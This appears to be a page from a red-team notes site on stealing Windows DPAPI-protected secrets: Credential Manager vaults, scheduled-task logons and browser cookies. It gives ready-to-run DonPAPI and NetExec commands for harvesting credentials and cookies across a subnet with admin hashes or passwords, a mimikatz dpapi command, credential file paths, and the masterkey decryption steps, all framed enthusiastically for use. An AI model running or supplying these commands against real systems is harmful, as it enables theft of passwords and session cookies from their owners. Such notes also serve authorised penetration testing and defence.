DPAPI, Browser Cookies, and CredMan
Windows needs to stored encrypted secrets for things like scheduled task logons and web cookies. These are stored in the Windows Credential Manager as "vaults" - vaults hold encrypted credential blobs. If you're a local Administrator, you can dump the DPAPI masterkey and decrypt the vault credentials.
DonPAPI is an amazing tool for this! Specify -nr to stop collecting SAM and LSASS and watch the cleartext creds roll in!
donpapi collect -d jotter.com -u Administrator -H HASHES -t 10.10.10.0/24 --pvkfile ./backup.pvkNetexec also has a module for DPAPI/cookies:
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi
# No SAM/LSASS
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi nosystem
# Browser Cookies only
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi cookiesManual Identification
Locating Credentials
Look for stored user credentials and scheduled task credentials.
C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CredentialsYou can also use mimikatz to list vault credentials.
mimikatz sekurlsa::dpapiDecrypting
After identifying a target credential, locate the associated masterkey GUID.
You can also send a request to the DC for the masterkey for your user's creds.
Finally, decrypt the credential with the masterkey.
Last updated